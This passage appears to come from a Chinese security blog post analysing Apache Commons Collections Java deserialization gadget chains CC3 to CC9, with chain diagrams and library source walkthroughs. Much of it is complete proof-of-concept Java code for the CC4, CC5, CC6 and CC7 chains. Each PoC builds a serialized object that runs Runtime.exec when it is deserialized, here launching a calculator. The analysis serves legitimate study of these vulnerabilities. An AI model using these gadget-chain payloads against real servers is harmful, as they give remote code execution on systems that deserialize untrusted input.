        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        }
        catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null) {
                field = getField(clazz.getSuperclass(), fieldName);
            }
        }
        return field;
    }
}

利用链

Gadget chain:
	ObjectInputStream.readObject()
				AnnotationInvocationHandler.readObject()
					Map(Proxy).entrySet()
						AnnotationInvocationHandler.invoke()
							LazyMap.get()
								ChainedTransformer.transform()
								ConstantTransformer.transform()
								InstantiateTransformer.transform()
								newInstance()
									TrAXFilter#TrAXFilter()
									TemplatesImpl.newTransformer()
											TemplatesImpl.getTransletInstance()
											TemplatesImpl.defineTransletClasses
											newInstance()
												Runtime.exec()

先看一下 InstantiateTransformer#transform，就是通过反射调用构造函数来实例化对象

public Object transform(Object input) {
    try {
        if (!(input instanceof Class)) {
            throw new FunctorException("InstantiateTransformer: Input object was not an instanceof Class, it was a " + (input == null ? "null object" : input.getClass().getName()));
        } else {
            Constructor con = ((Class)input).getConstructor(this.iParamTypes);
            return con.newInstance(this.iArgs);
        }
    }

CC3 用到了 TrAXFilter 这个类，其构造方法会调用 templates.newTransformer()，且 templates 可控

public TrAXFilter(Templates templates)  throws
      TransformerConfigurationException
  {
      _templates = templates;
      _transformer = (TransformerImpl) templates.newTransformer();
      _transformerHandler = new TransformerHandlerImpl(_transformer);
      _overrideDefaultParser = _transformer.overrideDefaultParser();
  }

CommonsCollections4

测试环境

jdk1.7
Commons Collections 4.0
cc4也没什么新的东西，实际上算是cc2和cc3的杂交体。。

cc3前半段用的是cc1的，在cc4里稍微改了一下，前半段换成cc2的了


Gadget chain:
	ObjectInputStream.readObject()
		PriorityQueue.readObject()
			PriorityQueue.heapify()
				PriorityQueue.siftDown()
					PriorityQueue.siftDownUsingComparator()
						TransformingComparator.compare()
							ChainedTransformer.transform()
								ConstantTransformer.transform()
								InstantiateTransformer.transform()
								newInstance()
									TrAXFilter#TrAXFilter()
									TemplatesImpl.newTransformer()
											TemplatesImpl.getTransletInstance()
											TemplatesImpl.defineTransletClasses
											newInstance()
												Runtime.exec()

poc

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;


import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;

import java.util.PriorityQueue;

public class ComCol4 {
    public static void main(String[] args) throws Exception {
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        CtClass cc = pool.makeClass("Cat");
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
        // 创建 static 代码块，并插入代码
        cc.makeClassInitializer().insertBefore(cmd);
        String randomClassName = "EvilCat" + System.nanoTime();
        cc.setName(randomClassName);
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName())); //设置父类为AbstractTranslet，避免报错
        // 写入.class 文件
        byte[] classBytes = cc.toBytecode();
        byte[][] targetByteCodes = new byte[][]{classBytes};
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setFieldValue(templates, "_bytecodes", targetByteCodes);
        // 进入 defineTransletClasses() 方法需要的条件
        setFieldValue(templates, "_name", "name");
        setFieldValue(templates, "_class", null);

        ChainedTransformer chain = new ChainedTransformer(new Transformer[] {
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates})
        });

        Constructor constructor = Class.forName("org.apache.commons.collections4.functors.InvokerTransformer").getDeclaredConstructor(String.class);
        constructor.setAccessible(true);
        InvokerTransformer transformer = (InvokerTransformer) constructor.newInstance("newTransformer");

        TransformingComparator comparator = new TransformingComparator(transformer);
        PriorityQueue queue = new PriorityQueue(1);

        Object[] queue_array = new Object[]{templates,1};

        Field queue_field = Class.forName("java.util.PriorityQueue").getDeclaredField("queue");
        queue_field.setAccessible(true);
        queue_field.set(queue,queue_array);

        Field size = Class.forName("java.util.PriorityQueue").getDeclaredField("size");
        size.setAccessible(true);
        size.set(queue,2);


        Field comparator_field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        comparator_field.setAccessible(true);
        comparator_field.set(queue,comparator);

        try{
            ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc4"));
            outputStream.writeObject(queue);
            outputStream.close();

            ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc4"));
            inputStream.readObject();
        }catch(Exception e){
            e.printStackTrace();
        }
    }

    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        }
        catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }
}

CommonsCollections5

适用版本：3.1-3.2.1，JDK 1.8

利用链：

Gadget chain:
       ObjectInputStream.readObject()
           BadAttributeValueExpException.readObject()
               TiedMapEntry.toString()
                   LazyMap.get()
                       ChainedTransformer.transform()
                           ConstantTransformer.transform()
                           InvokerTransformer.transform()
                               Method.invoke()
                                   Class.getMethod()
                           InvokerTransformer.transform()
                               Method.invoke()
                                   Runtime.getRuntime()
                           InvokerTransformer.transform()
                               Method.invoke()
                                   Runtime.exec()

poc

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;


import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;

import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;

public class ComCol5 {
    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, IllegalAccessException,
            InvocationTargetException, InstantiationException, IOException, NoSuchFieldException {
        Transformer[] realPoc  = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{ ("calc")})};
        ChainedTransformer fakeChain = new ChainedTransformer(new Transformer[]{ new ConstantTransformer("random")});

        Map innerMap = new HashMap();
        LazyMap mapDemo = (LazyMap) LazyMap.decorate(innerMap, fakeChain);
        TiedMapEntry rceDemo = new TiedMapEntry(mapDemo, "random");
        BadAttributeValueExpException finaldemo = new BadAttributeValueExpException("random");
        Field valDemo = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        valDemo.setAccessible(true);
        valDemo.set(finaldemo, rceDemo);

        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(fakeChain, realPoc);

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(finaldemo);
        oos.close();

        System.out.println(bos);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()));
        ois.readObject();
    }
}

在cc5中用到的是TiedMapEntry中的toString方法：

1
2
3

public String toString() {
        return this.getKey() + "=" + this.getValue();
    }

跟进getValue方法：

1
2
3

public V getValue() {
    return this.map.get(this.key);
}

可以发现这里对this.map调用了get方法，并将key传递进去，所以这里只需要令map为我们前面构造好的LazyMap，即可触发rce。其中map和key是可控的。

public TiedMapEntry(Map map, Object key) {
    this.map = map;
    this.key = key;
}

接下来我们需要找哪里调用了toString方法，在cc5中使用了BadAttributeValueExpException这个类。 valObj从Filed中取出来的，通过反射来设置BadAttributeValueExpException中val的值为TiedMapEntry即可触发命令执行。

private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
       ObjectInputStream.GetField gf = ois.readFields();
       Object valObj = gf.get("val", null);

       if (valObj == null) {
           val = null;
       } else if (valObj instanceof String) {
           val= valObj;
       } else if (System.getSecurityManager() == null
               || valObj instanceof Long
               || valObj instanceof Integer
               || valObj instanceof Float
               || valObj instanceof Double
               || valObj instanceof Byte
               || valObj instanceof Short
               || valObj instanceof Boolean) {
           val = valObj.toString();//调用点
       } else { // the serialized object is from a version without JDK-8019292 fix
           val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
       }
   }

为什么创建BadAttributeValueExpException实例时不直接将构造好的TiedMapEntry传进去而要通过反射来修改val的值？
以下为BadAttributeValueExpException的构造方法：

1
2
3

public BadAttributeValueExpException (Object val) {
        this.val = val == null ? null : val.toString();
    }

可以发现，如果我们直接将前面构造好的TiedMapEntry传进去，在这里就会触发toString，从而导致rce。此时val的值为UNIXProcess，这是不可以被反序列化的，所以我们需要在不触发rce的前提，将val设置为构造好的TiedMapEntry。否则就会报出错误。

CommonsCollections6

CC6 特点：适用范围广，受 JDK 版本影响最小

poc1

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;


import java.io.*;
import java.lang.reflect.Field;

import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

public class ComCol6 {
    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, IllegalAccessException
            , InstantiationException, IOException, NoSuchFieldException {
        Transformer[] realPoc  = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{ ("calc")})};
        ChainedTransformer fakeChain = new ChainedTransformer(new Transformer[]{ new ConstantTransformer("random")});

        Map innerMap = new HashMap();
        LazyMap mapDemo = (LazyMap) LazyMap.decorate(innerMap, fakeChain);
        TiedMapEntry rceDemo = new TiedMapEntry(mapDemo, "random");
        HashSet map = new HashSet(1);
        map.add("foo");
        Field f = null;
        try {
            f = HashSet.class.getDeclaredField("map");
        } catch (NoSuchFieldException e) {
            f = HashSet.class.getDeclaredField("backingMap");
        }

        f.setAccessible(true);
        HashMap innimpl = (HashMap) f.get(map);
        Field f2 = null;
        try {
            f2 = HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException e) {
            f2 = HashMap.class.getDeclaredField("elementData");
        }
        f2.setAccessible(true);
        Object[] array = (Object[]) f2.get(innimpl);

        Object node = array[0];
        if(node == null){
            node = array[1];
        }
        Field keyField = null;
        try{
            keyField = node.getClass().getDeclaredField("key");
        }catch(Exception e){
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }
        keyField.setAccessible(true);
        keyField.set(node, rceDemo);

        Field cf = ChainedTransformer.class.getDeclaredField("iTransformers");
        cf.setAccessible(true);
        cf.set(fakeChain, realPoc);

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(map);
        oos.close();

        System.out.println(bos);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()));
        ois.readObject();
    }
}

利用链

java.io.ObjectInputStream.readObject()
       java.util.HashSet.readObject()
           java.util.HashMap.put()
           java.util.HashMap.hash()
               org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
               org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
                   org.apache.commons.collections.map.LazyMap.get()
                       org.apache.commons.collections.functors.ChainedTransformer.transform()
                       org.apache.commons.collections.functors.InvokerTransformer.transform()
                       java.lang.reflect.Method.invoke()
                           java.lang.Runtime.exec()

CC6 其实跟 CC5 是在 TiedMapEntry#getValue 延伸出来并行的两条链

回顾我们通过 TiedMapEntry#getValue 而进行 RCE 的 demo

回顾 TiedMapEntry 里面的方法，CC5 用的是 TiedMapEntry#toString，里面调用了getValue，那么其实在 TiedMapEntry 还有 hashCode 跟 equals 同样调用了 getValue,cc6中使用hashCode

public boolean equals(Object obj) {
    if (obj == this) {
        return true;
    } else if (!(obj instanceof Entry)) {
        return false;
    } else {
        Entry other = (Entry)obj;
        Object value = this.getValue();
        return (this.key == null ? other.getKey() == null : this.key.equals(other.getKey())) && (value == null ? other.getValue() == null : value.equals(other.getValue()));
    }
}

public int hashCode() {
    Object value = this.getValue();
    return (this.getKey() == null ? 0 : this.getKey().hashCode()) ^ (value == null ? 0 : value.hashCode());
}

接着就需要找哪里触发了hashCode，cc6中使用的是HashMap#hash

static final int hash(Object key) {
    int h;
    return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

key目前还不是我们可控的，所以需要找某个点调用了hash方法，并且传递的参数是我们可控的，这里用到了HashMap#put

1
2
3

public V put(K key, V value) {
       return putVal(hash(key), key, value, false, true);
   }

key还是不是我们可控的，所以还需要找某个点调用了put方法，并且传递的第一个参数是我们可控的，最后找到了HashSet#readObject

private void readObject(java.io.ObjectInputStream s)
       throws java.io.IOException, ClassNotFoundException {
       // Read in any hidden serialization magic
       s.defaultReadObject();

 ……
       // Read in all elements in the proper order.
       for (int i=0; i<size; i++) {
           @SuppressWarnings("unchecked")
               E e = (E) s.readObject();
           map.put(e, PRESENT);
       }
   }

poc2

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;


import java.io.*;
import java.lang.reflect.Field;

import java.util.HashMap;;
import java.util.Map;

public class ComCol4 {
    public static void main(String[] args) throws Exception {
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class,
                        Class[].class }, new Object[] { "getRuntime",
                        new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class,
                        Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class },
                        new String[] { "calc" }),
                new ConstantTransformer(1),
        };
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        // 不再使用原CommonsCollections6中的HashSet，直接使用HashMap
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);
        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");
        Map expMap = new HashMap();
        expMap.put(tme, "valuevalue");
        outerMap.remove("keykey");

        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);

        // ==================
        // 生成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        // 本地测试触发
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}

简化链中用到了 HashMap#readObject 中的 hash 方法来触发 hashCode 方法

  private void readObject(java.io.ObjectInputStream s)
        throws IOException, ClassNotFoundException {
……
            // Read the keys and values, and put the mappings in the HashMap
            for (int i = 0; i < mappings; i++) {
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }
        }
    }

CommonsCollections7

poc

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;


import java.io.*;
import java.lang.reflect.Field;

import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;;
import java.util.Hashtable;
import java.util.Map;

public class ComCol7 {
    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, IllegalAccessException,
            InvocationTargetException, InstantiationException, IOException, NoSuchFieldException {
        Transformer[] realPoc  = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{ ("calc")}),
                new ConstantTransformer(1)};
        ChainedTransformer fakeChain = new ChainedTransformer(new Transformer[]{
                new ConstantTransformer("random")});

        Map innerMap1 = new HashMap();
        Map innerMap2 = new HashMap();
        // Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject
        Map lazyMap1 = LazyMap.decorate(innerMap1, fakeChain);
        lazyMap1.put("yy", 1);
        Map lazyMap2 = LazyMap.decorate(innerMap2, fakeChain);
        lazyMap2.put("zZ", 1);

        // Use the colliding Maps as keys in Hashtable
        Hashtable hashtable = new Hashtable();
        hashtable.put(lazyMap1, 1);
        hashtable.put(lazyMap2, 2);


        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(fakeChain, realPoc);

        lazyMap2.remove("yy");

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(hashtable);
        oos.close();

        System.out.println(bos);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()));
        ois.readObject();
    }
}

cc7通过AbstractMap#equals来触发对LazyMap#get方法的调用。如果这里的m是我们可控的，那么我们设置m为LazyMap，即可完成后面的rce触发。

public boolean equals(Object o) {
      if (o == this)
          return true;

      if (!(o instanceof Map))
          return false;
      Map<?,?> m = (Map<?,?>) o;
      if (m.size() != size())
          return false;

      try {
          Iterator<Entry<K,V>> i = entrySet().iterator();
          while (i.hasNext()) {
              Entry<K,V> e = i.next();
              K key = e.getKey();
              V value = e.getValue();
              if (value == null) {
                  if (!(m.get(key)==null && m.containsKey(key)))
                      return false;
              } else {
                  if (!value.equals(m.get(key)))
                      return false;

先寻找调用equals方法的点，cc7中使用了HashTable#reconstitutionPut：

private void reconstitutionPut(Entry<?,?>[] tab, K key, V value)
    throws StreamCorruptedException
{
    if (value == null) {
        throw new java.io.StreamCorruptedException();
    }
    // Makes sure the key is not already in the hashtable.
    // This should not happen in deserialized version.
    int hash = key.hashCode();
    int index = (hash & 0x7FFFFFFF) % tab.length;
    for (Entry<?,?> e = tab[index] ; e != null ; e = e.next) {
        if ((e.hash == hash) && e.key.equals(key)) {
            throw new java.io.StreamCorruptedException();
        }
    }
    // Creates the new entry.
    @SuppressWarnings("unchecked")
        Entry<K,V> e = (Entry<K,V>)tab[index];
    tab[index] = new Entry<>(hash, key, value, e);
    count++;
}

这里的key如果是我们可控的，那么m就是我们可控的，接着在HashTable#readObject中调用了reconstitutionPut方法，并将key传递进去：

private void readObject(java.io.ObjectInputStream s)
     throws IOException, ClassNotFoundException
{
    ……
    // Read the number of elements and then all the key/value objects
    for (; elements > 0; elements--) {
        @SuppressWarnings("unchecked")
            K key = (K)s.readObject();
        @SuppressWarnings("unchecked")
            V value = (V)s.readObject();
        // sync is eliminated for performance
        reconstitutionPut(table, key, value);
    }
}

在readObject方法中传递进去的key，是使用readObject得到的，那么在writeObject处，也必然会有：

private void writeObject(java.io.ObjectOutputStream s)
        throws IOException {
    Entry<Object, Object> entryStack = null;

    synchronized (this) {
        // Write out the threshold and loadFactor
        s.defaultWriteObject();

        // Write out the length and count of elements
        s.writeInt(table.length);
        s.writeInt(count);

        // Stack copies of the entries in the table
        for (int index = 0; index < table.length; index++) {
            Entry<?,?> entry = table[index];

            while (entry != null) {
                entryStack =
                    new Entry<>(0, entry.key, entry.value, entryStack);
                entry = entry.next;
            }
        }
    }

    // Write out the key/value objects from the stacked entries
    while (entryStack != null) {
        s.writeObject(entryStack.key);
        s.writeObject(entryStack.value);
        entryStack = entryStack.next;
    }
}

1.为什么要调用两次put?
2.为什么调用的两次put其中map中key的值分别为yy和zZ?
3.为什么在调用完HashTable#put之后，还需要在map2中remove掉yy？
详细原理可看此文章：
https://paper.seebug.org/1242/

CommonsCollections8

分析见这篇文章：https://www.anquanke.com/post/id/190472

CommonsCollections8是今年navalorenzo推送到ysoserial上的，8与2，4的区别在于使用了新的readObject触发点TreeBag

CommonsCollections9

主要利用的是CommonsCollections:3.2版本新增的 DefaultedMap 来代替 LazyMap

3.2.2 版本使用了黑名单，禁止了 InvokerTransformer 类在序列化和反序列化的使用
4.1 InvokerTransformer 和 InstantiateTransformer 两个类都没有实现 Serializable 接口

参考文章
Ysoserial CommonsCollections1 详细分析：https://www.anquanke.com/post/id/230788
ysoserial分析之CommonsCollections1
Commons Collections 反序列化利用链分析：https://p2hm1n.com/2021/02/13/Commons-Collections-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90/

ysoserial CommonsCollections2 详细分析：https://www.anquanke.com/post/id/232592
Java安全之反序列化篇-URLDNS&Commons Collections 1-7反序列化链分析：https://paper.seebug.org/1242/

FROM :blog.cfyqy.com | Author:cfyqy

左青龙
微信扫一扫

右白虎
微信扫一扫

Apache-Commons-Collections漏洞分析

CommonsCollections1

LazyMap 利用链 POC

TransformedMap 利用链 POC

CommonsCollections2

CommonsCollections3

CommonsCollections4

CommonsCollections5

CommonsCollections6

CommonsCollections7

CommonsCollections8

CommonsCollections9

2024 数信杯

第二届数据安全大赛暨首届数信杯积分争夺赛实践预赛南区Writeup

第二届数据安全大赛暨首届数信杯东部赛区writeup

西区-第二届数据安全大赛暨首届数信杯数据安全大赛 WP

阿里云CTF2024-暴力ENOTYOURWORLD题解

HackPack（LLM挑战）Writeup

第四届红明谷杯卫星应用数据安全大赛 WEB writeup

阿里云第三届伏魔挑战赛wp

TamuCTF 2024 Writeup

Android CrackMe寻找flag（java方法版）

发表评论

在线咨询

微信